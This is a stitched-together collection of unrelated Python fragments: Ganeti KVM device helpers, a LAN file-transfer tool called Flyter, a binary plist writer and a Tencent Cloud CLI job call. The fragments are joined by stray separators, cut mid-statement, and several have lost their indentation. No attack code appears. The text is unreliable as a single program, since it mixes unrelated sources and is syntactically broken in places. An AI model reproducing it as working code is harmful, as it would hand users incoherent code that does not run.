  @param link: The device link as returned by _SymlinkBlockDev()
  @type uri: string
  @param uri: The drive uri as returned by _CalculateDeviceURI()

  @return: The drive uri to use in kvm option

  """
  access_mode = disk.params.get(constants.LDP_ACCESS,
                                constants.DISK_KERNELSPACE)
  # A URI is only usable with userspace access; otherwise fall back to
  # the symlink created at block-device setup time.
  if uri and access_mode == constants.DISK_USERSPACE:
    return uri
  return link
def _GenerateDeviceKVMId(dev_type, dev):
"""Helper function to generate a unique device name used by KVM
QEMU monitor commands use names to identify devices. Since the UUID
is too long for a device ID (36 chars vs. 30), we choose to use
only the part until the third '-' with a disk/nic prefix.
For example if a disk has UUID '932df160-7a22-4067-a566-7e0ca8386133'
the resulting device ID would be 'disk-932df160-7a22-4067'.
@type dev_type: string
@param dev_type: device type of param dev (HOTPLUG_TARGET_DISK|NIC)
@type dev: L{objects.Disk} or L{objects.NIC}
@param dev: the device object for which we generate a kvm name
"""
return "%s-%s" % (dev_type.lower(), dev.uuid.rsplit("-", 2)[0])
def _GenerateDeviceHVInfoStr(hvinfo):
"""Construct the -device option string for hvinfo dict
PV disk: virtio-blk-pci,id=disk-1234,bus=pci.0,addr=0x9
PV NIC: virtio-net-pci,id=nic-1234,bus=pci.0,addr=0x9
SG disk: scsi-generic,id=disk-1234,bus=scsi.0,channel=0,scsi-id=1,lun=0
@type hvinfo: dict
@param hvinfo: dictionary created by _GenerateDeviceHVInfo()
@rtype: string
@return: The constructed string to be passed along with a -device option
"""
# work on a copy
d = dict(hvinfo)
hvinfo_str = d.pop("driver")
for k, v in d.items():
hvinfo_str += ",%s=%s" % (k, v)
return hvinfo_str
def _GenerateDeviceHVInfo(dev_type, kvm_devid, hv_dev_type, bus_slots):
  """Helper function to generate hvinfo of a device (disk, NIC)

  hvinfo holds everything needed for the -device QEMU option: driver,
  device id, bus, and the location on that bus. PCI devices are placed on
  a free slot (addr) of the first PCI bus (pci.0); SCSI disks each get a
  distinct target (scsi-id) on the first SCSI bus (scsi.0).

  @type dev_type: string
  @param dev_type: either HOTPLUG_TARGET_DISK or HOTPLUG_TARGET_NIC
  @type kvm_devid: string
  @param kvm_devid: the id of the device
  @type hv_dev_type: string
  @param hv_dev_type: either disk_type or nic_type hvparam
  @type bus_slots: dict
  @param bus_slots: the current slots of the first PCI and SCSI buses
  @rtype: dict
  @return: dict including all necessary info (driver, id, bus and bus
    location) for generating a -device QEMU option for either a disk or
    a NIC

  """
  bus = _DEVICE_BUS[dev_type](hv_dev_type)
  # Reserve the slot so subsequent devices pick a different one.
  slot = utils.GetFreeSlot(bus_slots[bus], reserve=True)
  hvinfo = {
    "driver": _DEVICE_DRIVER[dev_type](hv_dev_type),
    "id": kvm_devid,
    "bus": bus,
    }
  if bus == _PCI_BUS:
    hvinfo["addr"] = hex(slot)
  elif bus == _SCSI_BUS:
    hvinfo["channel"] = 0
    hvinfo["scsi-id"] = slot
    hvinfo["lun"] = 0
  return hvinfo
def _GetExistingDeviceInfo(dev_type, device, runtime):
  """Helper function to get an existing device inside the runtime file

  Used when an instance is running. Loads the kvm runtime data and looks
  up the entry matching the device's type and UUID.

  @type dev_type: string
  @param dev_type: device type of param dev
  @type device: L{objects.Disk} or L{objects.NIC}
  @param device: the device object for which we generate a kvm name
  @type runtime: tuple (cmd, nics, hvparams, disks)
  @param runtime: the runtime data to search for the device
  @raise errors.HotplugError: in case the requested device does not
    exist (e.g. device has been added without --hotplug option)

  """
  runtime_entries = runtime[_DEVICE_RUNTIME_INDEX[dev_type]]
  matches = _FIND_RUNTIME_ENTRY[dev_type](device, runtime_entries)
  if not matches:
    raise errors.HotplugError("Cannot find runtime info for %s with UUID %s" %
                              (dev_type, device.uuid))
  return matches[0]
def _UpgradeSerializedRuntime(serialized_runtime):
"""Upgrade runtime data
Remove any deprecated fields or change the format of the data.
The runtime files are not upgraded when Ganeti is upgraded, so the required
modification have to be performed | |
aborted operation")
except AssertionError:
return printerror("Receiver rejected")
except timeout:
return printerror("Operation timed out")
except Exception:
return printerror("Error while sending headers to receiver")
print(f"[ {gethostname()}-{b64encode(self.token).decode()} ] "
f"is now sending file ({ProgressBar.byte_rescale(fsize)})")
# Progress bar thread
self._progress_bar = ProgressBar(fsize, 40)
self._progress_bar.start()
def progress_thread():
try:
# Wait until sending file
while not self._sending_file:
pass
# Display until file is sent
while not self._progress_bar.done:
self._progress_bar.display()
except:
return printerror("Error with progress thread")
Thread(target=progress_thread).start()
# Start sending
res = None
try:
if self._transfer_type == 'S':
res = self._send_s(fpath, fsize)
elif self._transfer_type == 'M':
res = self._send_m(fpath, fsizes)
assert self.socket.recv(1) == b'\x06' # ACK
except:
self._progress_bar.stop()
self._sending_file = False
return printerror(f"Sending file was unsuccessful")
else:
# Wait for progress bar
while not self._progress_bar.done:
pass
self._progress_bar.display()
print(f"\nSuccessfully sent: {fname}")
return res
def recv_param_set(self):
    """
    Receive and unpack Receiver's parameter settings.

    Used to set Sender's parameter settings used during data
    transmissions.

    Protocol over ``self.socket``:
      1. connect to the receiver's main port;
      2. send a length-prefixed hostname and wait for ACK (0x06);
      3. read the receiver's hostname, 6-byte token, transfer type
         ('S'/'M') and worker port list, then ACK them back.
    """
    # Step 1: open the control connection.
    try:
        self.socket.connect((self.recver_ip, self.main_port))
    except error:
        return printerror("Can't connect to "
                          f"{self.recver_ip}:{self.main_port}")
    # Step 2: introduce ourselves; the receiver answers 0x06 on accept.
    try:
        sender_hn = pack_str(gethostname())
        len_sender_hn = int_to_bytes_s(len(sender_hn))
        self.socket.send(b''.join([len_sender_hn, sender_hn]))
        assert self.socket.recv(1) == b'\x06'  # ACK
    except AssertionError:
        return printerror("Receiver rejected handshake")
    except timeout:
        return printerror('Operation timed out')
    except:
        return printerror("Error during handshake")
    # Step 3: read parameters (each variable-length field is preceded by
    # its 2-byte length); NAK (0x15) back on any unpacking problem.
    try:
        len_hn = bytes_to_int_s(self.socket.recv(2))
        self._recver_hostname = unpack_str(self.socket.recv(len_hn))
        self._recver_token = self.socket.recv(6)
        self._transfer_type = unpack_str(self.socket.recv(1))
        len_wp = bytes_to_int_s(self.socket.recv(2))
        self._worker_ports = [bytes_to_int_s(self.socket.recv(2))
                              for w in range(len_wp)]
        self.socket.send(b'\x06')  # ACK
    except error:
        return printerror("Error getting connected with socket")
    except:
        self.socket.send(b'\x15')  # NAK
        return printerror("Error getting parameters from receiver")
    else:
        self.param_set = True
class FlyterReciever:
    """
    Handles Flyter file receiving processes.

    Note: Receives from FlyterSender instances.

    Parameters
    ----------
    host_ip : str
        The Host IP address to be used.
    main_port : int
        The main TCP port to be used.
    num_workers : int
        The amount of workers to be used during transmission.
    """

    # Fallback packet size; the effective size comes from FlyterSender.
    DEFAULT_PACKET_SIZE = 512

    @staticmethod
    def storage_dir(hostname=None):
        """
        Return the path of the storage dir for received files.

        If the storage directory doesn't exist, creates it first.

        Parameters
        ----------
        hostname : str
            The name of the subdirectory where that
            host's sent files are stored.
        """
        app_dirname = dirname(__file__)
        appfiles_dirname = join(app_dirname, 'Flyter')
        if not exists(appfiles_dirname):
            mkdir(appfiles_dirname)
        storage_dirname = join(appfiles_dirname, 'Received Files')
        if not exists(storage_dirname):
            mkdir(storage_dirname)
        if hostname:
            host_storage_dirname = join(storage_dirname, hostname)
            if not exists(host_storage_dirname):
                mkdir(host_storage_dirname)
            return host_storage_dirname
        else:
            return storage_dirname

    def __init__(self, host_ip, main_port, num_workers):
        # Local import keeps the fix self-contained; secrets is the right
        # source for an unguessable session token.
        from secrets import token_bytes

        self.host_ip = host_ip
        self.main_port = main_port
        # BUG FIX: this assignment was corrupted in the source; a 6-byte
        # random session token identifies this receiver to senders.
        self.token = token_bytes(6)
        self.transfer_type = 'S' if num_workers == 1 else 'M'
        self.worker_ports = [
            random_port(self.host_ip) for w in range(num_workers)
        ] if num_workers > 1 else []
        # Per-transfer state, populated by send_param_set()/recv_file().
        self._sender_socket = None
        self._sender_hostname = None
        self._sender_token = None
        self._sender_filename = None
        self._sender_filesizes = None
        self._packet_size = FlyterSender.DEFAULT_PACKET_SIZE
        self._recving_file = False
        self._workers_active = 0
        self._progress_bar = ProgressBar(None)
        try:
            self.socket = socket(AF_INET, SOCK_STREAM)
            self.socket.bind((self.host_ip, self.main_port))
            self.socket.settimeout(60)
            self.workers = [
                socket(AF_INET, SOCK_STREAM) for w in range(num_workers)
            ] if num_workers > 1 else []
            if self.workers:
                for w in range(num_workers):
                    self.workers[w].bind((self.host_ip, self.worker_ports[w]))
                    self.workers[w].settimeout(60)
        except:
            printerror('Error initializing sockets')
        self.param_set = False

    def __del__(self):
        # Close whatever sockets made it through __init__.
        if isinstance(self.__dict__.get('socket'), socket):
            self.socket.close()
        if self.__dict__.get('workers'):
            for w in self.workers:
                w.close()

    def _recv_s(self):
        """Receive a file with a single worker."""
        if not self.param_set:
            return printerror("Sender not yet set with parameters")
        try:
            self._recving_file = True
            path = join(
                FlyterReciever.storage_dir(self._sender_hostname),
                self._sender_filename
            )
            fs = self._sender_filesizes[0]
            with open(path, 'bw') as f:
                while self._recving_file and fs:
                    packet = self._sender_socket.recv(self._packet_size)
                    if not packet:
                        # Peer closed early; without this, recv() keeps
                        # returning b'' and the loop would spin forever.
                        raise error("Connection closed prematurely")
                    f.write(packet)
                    self._progress_bar.add_progress(len(packet))
                    fs -= len(packet)
            self._sender_socket.send(b'\x06')  # ACK
        except timeout:
            self._progress_bar.stop()
            return printerror("Operation timed out")
        except FileNotFoundError:
            self._progress_bar.stop()
            return printerror("Downloading file has been deleted")
        except PermissionError:
            self._progress_bar.stop()
            return printerror("Couldn't access storage directory")
        except error:
            self._progress_bar.stop()
            return printerror("Error with socket")
        except:
            self._progress_bar.stop()
            return printerror("Error receiving file")
        else:
            self._recving_file = False
            return True

    def _recv_m(self):
        """
        Receive a file with multiple workers.

        Speeds up transmission rate by using multiple workers: each
        worker receives one part into a temp file, then the parts are
        concatenated in worker order and the temp files removed.
        """
        if not self.param_set:
            return printerror("Sender not yet set with parameters")

        def threadfunc(worker_num, fpath):
            self._workers_active += 1
            try:
                recver_socket = self.workers[worker_num]
                recver_socket.listen(1)
                sender_socket, hostaddr = recver_socket.accept()
                send_tok = sender_socket.recv(6)
                if send_tok == self._sender_token:
                    sender_socket.send(b'\x06')  # ACK
                else:
                    sender_socket.send(b'\x15')  # NAK
                    # BUG FIX: previously the worker kept receiving data
                    # even after rejecting the token.
                    return printerror("Rejected worker with unknown token")
                fs = self._sender_filesizes[worker_num]
                with open(fpath, 'bw') as f:
                    while self._recving_file and f.writable() and fs:
                        packet = sender_socket.recv(self._packet_size)
                        if not packet:
                            # Peer closed early; avoid spinning on b''.
                            raise error("Connection closed prematurely")
                        f.write(packet)
                        self._progress_bar.add_progress(len(packet))
                        fs -= len(packet)
                sender_socket.send(b'\x06')  # ACK
            except KeyboardInterrupt:
                self._progress_bar.stop()
                self._recving_file = False
                return printerror("User aborted operation")
            except timeout:
                self._progress_bar.stop()
                self._recving_file = False
                return printerror("Operation timed out")
            except error:
                self._progress_bar.stop()
                self._recving_file = False
                return printerror("Error with sockets")
            except:
                self._progress_bar.stop()
                self._recving_file = False
                return printerror("Error while receiving file")
            finally:
                self._workers_active -= 1

        num_workers = len(self.workers)
        self._recving_file = True
        try:
            for w in range(len(self.worker_ports)):
                wpath = join(
                    FlyterReciever.storage_dir(self._sender_hostname),
                    f"{w}_{self._sender_filename}"
                )
                Thread(
                    target=threadfunc,
                    args=(w, wpath),
                ).start()
        except FileNotFoundError:
            return printerror("Couldn't access file")
        except PermissionError:
            return printerror("Couldn't access file due to permission error")
        # Busy-wait until every worker thread finishes.
        # NOTE(review): this spins a CPU core; consider joining threads.
        while self._workers_active:
            try:
                pass
            except KeyboardInterrupt:
                self._progress_bar.stop()
                self._recving_file = False
                printerror("User aborted operation")
        self._recving_file = False
        try:
            # Build the file from the per-worker parts, in worker order.
            path = join(
                FlyterReciever.storage_dir(self._sender_hostname),
                self._sender_filename
            )
            with open(path, 'bw') as output:
                for w in range(num_workers):
                    wpath = join(
                        FlyterReciever.storage_dir(self._sender_hostname),
                        f"{w}_{self._sender_filename}"
                    )
                    with open(wpath, 'br') as temp:
                        packet = True
                        while packet:
                            packet = temp.read(self._packet_size)
                            output.write(packet)
                    # Clear the contents of the temp file
                    open(wpath, 'bw').close()
            # Delete the temp files
            for w in range(num_workers):
                wpath = join(
                    FlyterReciever.storage_dir(self._sender_hostname),
                    f"{w}_{self._sender_filename}"
                )
                unlink(wpath)
        except PermissionError:
            self._sender_socket.send(b'\x15')  # NAK
            return printerror("Couldn't save file due to permissions")
        except error:
            return printerror("Error with sockets")
        except:
            self._sender_socket.send(b'\x15')  # NAK
            return printerror("Error while saving file")
        else:
            return True

    def recv_file(self):
        """
        Receive a file.

        Reads the transfer headers (token, filename, per-worker sizes),
        asks the user to accept, then dispatches to the single- or
        multi-worker receive path while a progress bar renders in a
        background thread.
        """
        if not self.param_set:
            return printerror("Not yet set with receiver's parameters")
        # Headers
        try:
            tok = self._sender_socket.recv(6)
            b64_tok = b64encode(tok).decode()
            len_fn = bytes_to_int_s(self._sender_socket.recv(2))
            fn = unpack_str(self._sender_socket.recv(len_fn))
            len_fs = bytes_to_int_s(self._sender_socket.recv(2))
            fs = [bytes_to_int_l(self._sender_socket.recv(4))
                  for s in range(len_fs)]
            fs_all = sum(fs)
            answer = input(f"{self._sender_hostname}-{b64_tok}"
                           f" wants to send: {fn} "
                           f"({ProgressBar.byte_rescale(fs_all)}). "
                           "Accept? (y/n) ")
            if answer.lower() == 'y':
                self._sender_socket.send(b'\x06')  # ACK
            else:
                # BUG FIX: a rejection must send NAK (0x15); this used to
                # send ACK (0x06), telling the sender to start anyway.
                self._sender_socket.send(b'\x15')  # NAK
                return printalert("Rejected file transfer")
        except error:
            return printerror("Sender isn't available anymore")
        except:
            self._sender_socket.send(b'\x15')  # NAK
            return printerror("Error while receiving headers")
        print(f"[ {gethostname()}-{b64encode(self.token).decode()} ] "
              f"is now receiving file ({ProgressBar.byte_rescale(fs_all)})")
        # Progress bar thread
        self._progress_bar = ProgressBar(fs_all, 35)
        self._progress_bar.start()

        def progress_thread():
            try:
                # Wait until receiving file
                while not self._recving_file:
                    pass
                # Display until file is received
                while not self._progress_bar.done:
                    self._progress_bar.display()
            except:
                return printerror("Error with progress thread")

        Thread(target=progress_thread).start()
        self._sender_token = tok
        self._sender_filename = fn
        self._sender_filesizes = fs
        # Start receiving
        try:
            if self.transfer_type == 'S':
                res = self._recv_s()
            elif self.transfer_type == 'M':
                res = self._recv_m()
            else:
                res = None
        except:
            self._progress_bar.stop()
            self._recving_file = False
            return printerror("Receiving file was unsuccessful")
        else:
            self._sender_socket.send(b'\x06')  # ACK
            # Wait for progress bar
            while not self._progress_bar.done:
                pass
            self._progress_bar.display()
            print(f"\nSuccessfully received: {self._sender_filename}")
            return res

    def send_param_set(self):
        """
        Pack and send Receiver's parameter settings.

        Used to set Sender's parameter settings used during
        data transmissions.
        """
        # Wait for a sender to connect on the main port.
        try:
            printalert("Waiting for sender")
            self.socket.listen(1)
            self._sender_socket, addrport = self.socket.accept()
        except timeout:
            return printerror("No sender available")
        except:
            return printerror("Error while waiting for sender")
        # Handshake: read the sender's length-prefixed hostname, then ACK.
        try:
            len_sender_hn = bytes_to_int_s(self._sender_socket.recv(2))
            sender_hn = self._sender_socket.recv(len_sender_hn)
            self._sender_hostname = unpack_str(sender_hn)
            self._sender_socket.send(b'\x06')  # ACK
        except timeout:
            return printerror("Operation timed out")
        except:
            return printerror("Error during handshake")
        # Build and send our parameters: hostname, token, transfer type
        # and the list of worker ports.
        try:
            hn = pack_str(gethostname())
            len_hn = int_to_bytes_s(len(hn))
            tok = self.token
            tr_type = pack_str(self.transfer_type)
            len_wp = int_to_bytes_s(len(self.worker_ports))
            wp = [int_to_bytes_s(port)
                  for port in self.worker_ports]
            wp = b''.join(wp)
            headers = b''.join([len_hn, hn, tok, tr_type, len_wp, wp])
        except:
            return printerror("Error building headers")
        try:
            self._sender_socket.send(headers)
            assert self._sender_socket.recv(1) == b'\x06'  # ACK
        except:
            return printerror("Error while sending headers to sender")
        else:
            self.param_set = True
# Simplified Functions
def send(ip_address, port, filepath):
    """
    Send file to receiver on the same network.

    Parameters
    ----------
    ip_address : str
        The target receiver's IP address.
    port : int
        The target receiver's main TCP port.
    filepath : str
        The path to the file to be sent.
    """
    # Exchange transfer parameters first, then run the transfer itself.
    file_sender = FlyterSender(ip_address, port)
    file_sender.recv_param_set()
    return file_sender.send_file(filepath)
def receive(host_ip_address, port, workers=1):
    """
    Receive a file from sender on the same network.

    Parameters
    ----------
    host_ip_address : str
        The receiver's host IP address.
    port : int
        The receiver's host port to listen on.
    workers : :obj:`int`, optional
        The number of workers to use.

    Returns
    -------
    The result of the receive operation, mirroring what ``send``
    returns for symmetry (previously this result was discarded).
    """
    receiver = FlyterReciever(host_ip_address, port, workers)
    receiver.send_param_set()
    return receiver.recv_file()
if __name__ == '__main__':
parser = ArgumentParser(
prog="Flyter",
epilog="See | |
odd-sized or integers larger than 8 bytes
# Don't naively go over 16 bytes, in order to prevent infinite loops.
result = 0
if hasattr(int, 'from_bytes'):
result = int.from_bytes(data, 'big')
else:
for byte in data:
result = (result << 8) | unpack('>B', byte)[0]
else:
raise InvalidPlistException("Encountered integer longer than 16 bytes.")
return result
class HashableWrapper(object):
    """Identity wrapper that lets unhashable containers act as plist nodes."""

    def __init__(self, value):
        self.value = value

    def __repr__(self):
        # The single-item list keeps %-style semantics: a tuple value is
        # not expanded into multiple format arguments.
        return "<HashableWrapper: {0}>".format([self.value])
class BoolWrapper(object):
    """Wrapper distinguishing booleans from integers during serialization."""

    def __init__(self, value):
        self.value = value

    def __repr__(self):
        return "<BoolWrapper: {0}>".format(self.value)
class FloatWrapper(object):
    """Interning wrapper for floats: one shared instance per value."""

    # Cache of value -> wrapper, shared across the class.
    _instances = {}

    def __new__(klass, value):
        # Ensure FloatWrapper(x) for a given float x is always the same object
        try:
            return klass._instances[value]
        except KeyError:
            wrapper = object.__new__(klass)
            wrapper.value = value
            klass._instances[value] = wrapper
            return wrapper

    def __repr__(self):
        return "<FloatWrapper: %s>" % self.value
class PlistWriter(object):
header = b'bplist00bybiplist1.0'
file = None
byteCounts = None
trailer = None
computedUniques = None
writtenReferences = None
referencePositions = None
wrappedTrue = None
wrappedFalse = None
def __init__(self, file):
    """Create a writer that serializes plists to *file* (binary mode)."""
    self.file = file
    # Canonical singletons for booleans, reused across the whole write.
    self.wrappedTrue = BoolWrapper(True)
    self.wrappedFalse = BoolWrapper(False)
    self.reset()
def reset(self):
    """Return the writer to a pristine state before writing a new plist."""
    # Nothing written yet: zeroed per-type byte counts, empty trailer.
    self.byteCounts = PlistByteCounts(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
    self.trailer = PlistTrailer(0, 0, 0, 0, 0)
    self.computedUniques = set()   # uniques whose sizes were computed
    self.writtenReferences = {}    # object -> assigned reference number
    self.referencePositions = {}   # object -> byte offset in the output
def positionOfObjectReference(self, obj):
"""If the given object has been written already, return its
position in the offset table. Otherwise, return None."""
return self.writtenReferences.get(obj)
def writeRoot(self, root):
    """
    Strategy is:
    - write header
    - wrap root object so everything is hashable
    - compute size of objects which will be written
      - need to do this in order to know how large the object refs
        will be in the list/dict/set reference lists
    - write objects
      - keep objects in writtenReferences
      - keep positions of object references in referencePositions
      - write object references with the length computed previously
    - compute object reference length
    - write object reference positions
    - write trailer
    """
    output = self.header
    # Wrap containers so they can act as keys in the reference tables.
    wrapped_root = self.wrapRoot(root)
    should_reference_root = True  # root is always written via a reference
    # First pass: tally sizes and collect uniques; this fixes how many
    # bytes each object reference needs (objectRefSize).
    self.computeOffsets(wrapped_root, asReference=should_reference_root, isRoot=True)
    self.trailer = self.trailer._replace(**{'objectRefSize':self.intSize(len(self.computedUniques))})
    # Second pass: emit the root reference and then the objects.
    (_, output) = self.writeObjectReference(wrapped_root, output)
    output = self.writeObject(wrapped_root, output, setReferencePosition=True)

    # output size at this point is an upper bound on how big the
    # object reference offsets need to be.
    self.trailer = self.trailer._replace(**{
        'offsetSize':self.intSize(len(output)),
        'offsetCount':len(self.computedUniques),
        'offsetTableOffset':len(output),
        'topLevelObjectNumber':0
        })

    output = self.writeOffsetTable(output)
    output += pack('!xxxxxxBBQQQ', *self.trailer)
    self.file.write(output)
def wrapRoot(self, root):
    """Recursively wrap *root* so every node is hashable.

    bool is checked before anything else (it must not fall through to
    the int handling elsewhere); floats are interned via FloatWrapper;
    containers are rebuilt with wrapped members inside HashableWrapper.
    Everything else passes through untouched.
    """
    if isinstance(root, bool):
        return self.wrappedTrue if root else self.wrappedFalse
    if isinstance(root, float):
        return FloatWrapper(root)
    if isinstance(root, set):
        return HashableWrapper({self.wrapRoot(item) for item in root})
    if isinstance(root, dict):
        return HashableWrapper({self.wrapRoot(key): self.wrapRoot(val)
                                for key, val in iteritems(root)})
    if isinstance(root, list):
        return HashableWrapper([self.wrapRoot(item) for item in root])
    if isinstance(root, tuple):
        return HashableWrapper(tuple(self.wrapRoot(item) for item in root))
    return root
def incrementByteCount(self, field, incr=1):
self.byteCounts = self.byteCounts._replace(**{field:self.byteCounts.__getattribute__(field) + incr})
def computeOffsets(self, obj, asReference=False, isRoot=False):
    """Recursively tally the encoded size of *obj*.

    Walks the (wrapped) object graph, adding each node's encoded size to
    the matching field of self.byteCounts and recording every unique
    referenced object in self.computedUniques. Must run before any
    object is written, since the object-reference width is derived from
    the number of uniques.

    @raise InvalidPlistException: for invalid dictionary keys (None,
        Data, non-strings) and for unknown object types.
    """
    def check_key(key):
        # Plist dictionary keys must be plain strings.
        if key is None:
            raise InvalidPlistException('Dictionary keys cannot be null in plists.')
        elif isinstance(key, Data):
            raise InvalidPlistException('Data cannot be dictionary keys in plists.')
        elif not isinstance(key, (bytes, unicode)):
            raise InvalidPlistException('Keys must be strings.')

    def proc_size(size):
        # Lengths above 0b1110 don't fit in the marker nibble and are
        # stored as a trailing integer object instead.
        if size > 0b1110:
            size += self.intSize(size)
        return size

    # If this should be a reference, then we keep a record of it in the
    # uniques table.
    if asReference:
        if obj in self.computedUniques:
            return
        else:
            self.computedUniques.add(obj)

    if obj is None:
        self.incrementByteCount('nullBytes')
    elif isinstance(obj, BoolWrapper):
        self.incrementByteCount('boolBytes')
    elif isinstance(obj, Uid):
        size = self.intSize(obj)
        self.incrementByteCount('uidBytes', incr=1+size)
    elif isinstance(obj, (int, long)):
        size = self.intSize(obj)
        self.incrementByteCount('intBytes', incr=1+size)
    elif isinstance(obj, FloatWrapper):
        size = self.realSize(obj)
        self.incrementByteCount('realBytes', incr=1+size)
    elif isinstance(obj, datetime.datetime):
        self.incrementByteCount('dateBytes', incr=2)
    elif isinstance(obj, Data):
        size = proc_size(len(obj))
        self.incrementByteCount('dataBytes', incr=1+size)
    elif isinstance(obj, (unicode, bytes)):
        size = proc_size(len(obj))
        self.incrementByteCount('stringBytes', incr=1+size)
    elif isinstance(obj, HashableWrapper):
        obj = obj.value
        if isinstance(obj, set):
            size = proc_size(len(obj))
            self.incrementByteCount('setBytes', incr=1+size)
            for value in obj:
                self.computeOffsets(value, asReference=True)
        elif isinstance(obj, (list, tuple)):
            size = proc_size(len(obj))
            self.incrementByteCount('arrayBytes', incr=1+size)
            # (an unused local assignment was removed here)
            for value in obj:
                self.computeOffsets(value, asReference=True)
        elif isinstance(obj, dict):
            size = proc_size(len(obj))
            self.incrementByteCount('dictBytes', incr=1+size)
            for key, value in iteritems(obj):
                check_key(key)
                self.computeOffsets(key, asReference=True)
                self.computeOffsets(value, asReference=True)
    else:
        raise InvalidPlistException("Unknown object type.")
def writeObjectReference(self, obj, output):
"""Tries to write an object reference, adding it to the references
table. Does not write the actual object bytes or set the reference
position. Returns a tuple of whether the object was a new reference
(True if it was, False if it already was in the reference table)
and the new output.
"""
position = self.positionOfObjectReference(obj)
if position is None:
self.writtenReferences[obj] = len(self.writtenReferences)
output += self.binaryInt(len(self.writtenReferences) - 1, byteSize=self.trailer.objectRefSize)
return (True, output)
else:
output += self.binaryInt(position, byteSize=self.trailer.objectRefSize)
return (False, output)
def writeObject(self, obj, output, setReferencePosition=False):
    """Serializes the given object to the output. Returns output.

    If setReferencePosition is True, will set the position the
    object was written.

    Each object starts with a one-byte marker: high nibble = type,
    low nibble = size/length (0b1111 means the real length follows
    as a separate integer object).
    """
    def proc_variable_length(format, length):
        # Emit the marker byte; lengths > 0b1110 are appended as an
        # integer object after the 0b1111 marker nibble.
        result = b''
        if length > 0b1110:
            result += pack('!B', (format << 4) | 0b1111)
            result = self.writeObject(length, result)
        else:
            result += pack('!B', (format << 4) | length)
        return result

    if isinstance(obj, (str, unicode)) and obj == unicodeEmpty:
        # The Apple Plist decoder can't decode a zero length Unicode string.
        obj = b''

    if setReferencePosition:
        self.referencePositions[obj] = len(output)

    if obj is None:
        output += pack('!B', 0b00000000)  # null marker
    elif isinstance(obj, BoolWrapper):
        if obj.value is False:
            output += pack('!B', 0b00001000)  # false marker
        else:
            output += pack('!B', 0b00001001)  # true marker
    elif isinstance(obj, Uid):
        size = self.intSize(obj)
        output += pack('!B', (0b1000 << 4) | size - 1)
        output += self.binaryInt(obj)
    elif isinstance(obj, (int, long)):
        # The size nibble stores log2 of the byte count (1/2/4/8 bytes).
        byteSize = self.intSize(obj)
        root = math.log(byteSize, 2)
        output += pack('!B', (0b0001 << 4) | int(root))
        output += self.binaryInt(obj, as_number=True)
    elif isinstance(obj, FloatWrapper):
        # just use doubles
        output += pack('!B', (0b0010 << 4) | 3)
        output += self.binaryReal(obj)
    elif isinstance(obj, datetime.datetime):
        # Dates are stored as seconds relative to apple_reference_date,
        # encoded as a big-endian double.
        timestamp = (obj - apple_reference_date).total_seconds()
        output += pack('!B', 0b00110011)
        output += pack('!d', float(timestamp))
    elif isinstance(obj, Data):
        output += proc_variable_length(0b0100, len(obj))
        output += obj
    elif isinstance(obj, unicode):
        # Length is counted in UTF-16 code units, not bytes.
        byteData = obj.encode('utf_16_be')
        output += proc_variable_length(0b0110, len(byteData)//2)
        output += byteData
    elif isinstance(obj, bytes):
        output += proc_variable_length(0b0101, len(obj))
        output += obj
    elif isinstance(obj, HashableWrapper):
        obj = obj.value
        if isinstance(obj, (set, list, tuple)):
            if isinstance(obj, set):
                output += proc_variable_length(0b1100, len(obj))
            else:
                output += proc_variable_length(0b1010, len(obj))
            # First the member references, then any members that have
            # not been written yet.
            objectsToWrite = []
            for objRef in obj:
                (isNew, output) = self.writeObjectReference(objRef, output)
                if isNew:
                    objectsToWrite.append(objRef)
            for objRef in objectsToWrite:
                output = self.writeObject(objRef, output, setReferencePosition=True)
        elif isinstance(obj, dict):
            output += proc_variable_length(0b1101, len(obj))
            # All key references first, then all value references, then
            # the bodies of anything not yet written.
            keys = []
            values = []
            objectsToWrite = []
            for key, value in iteritems(obj):
                keys.append(key)
                values.append(value)
            for key in keys:
                (isNew, output) = self.writeObjectReference(key, output)
                if isNew:
                    objectsToWrite.append(key)
            for value in values:
                (isNew, output) = self.writeObjectReference(value, output)
                if isNew:
                    objectsToWrite.append(value)
            for objRef in objectsToWrite:
                output = self.writeObject(objRef, output, setReferencePosition=True)
    return output
def writeOffsetTable(self, output):
    """Writes all of the object reference offsets.

    Offsets are emitted in reference-number order, so entry i of the
    table is the byte position of object i in the output.
    (A dead list that accumulated positions without using them has been
    removed.)
    """
    writtenReferences = list(self.writtenReferences.items())
    writtenReferences.sort(key=lambda x: x[1])
    for obj, order in writtenReferences:
        # Porting note: Elsewhere we deliberately replace empty unicode
        # strings with empty binary strings, but the empty unicode string
        # goes into writtenReferences. This isn't an issue in Py2
        # because u'' and b'' have the same hash; but it is in
        # Py3, where they don't.
        if bytes != str and obj == unicodeEmpty:
            obj = b''
        position = self.referencePositions.get(obj)
        if position is None:
            raise InvalidPlistException("Error while writing offsets table. Object not found. %s" % obj)
        output += self.binaryInt(position, self.trailer.offsetSize)
    return output
def binaryReal(self, obj):
# just use doubles
result = pack('>d', obj.value)
return result
def binaryInt(self, obj, byteSize=None, as_number=False):
result = b''
if byteSize is None:
byteSize = self.intSize(obj)
if byteSize == 1:
result += pack('>B', obj)
elif byteSize == 2:
result += pack('>H', obj)
elif byteSize == 4:
result += pack('>L', obj)
elif byteSize == 8:
if as_number:
result += pack('>q', | |
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TiemsClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateJobRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CreateJob(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
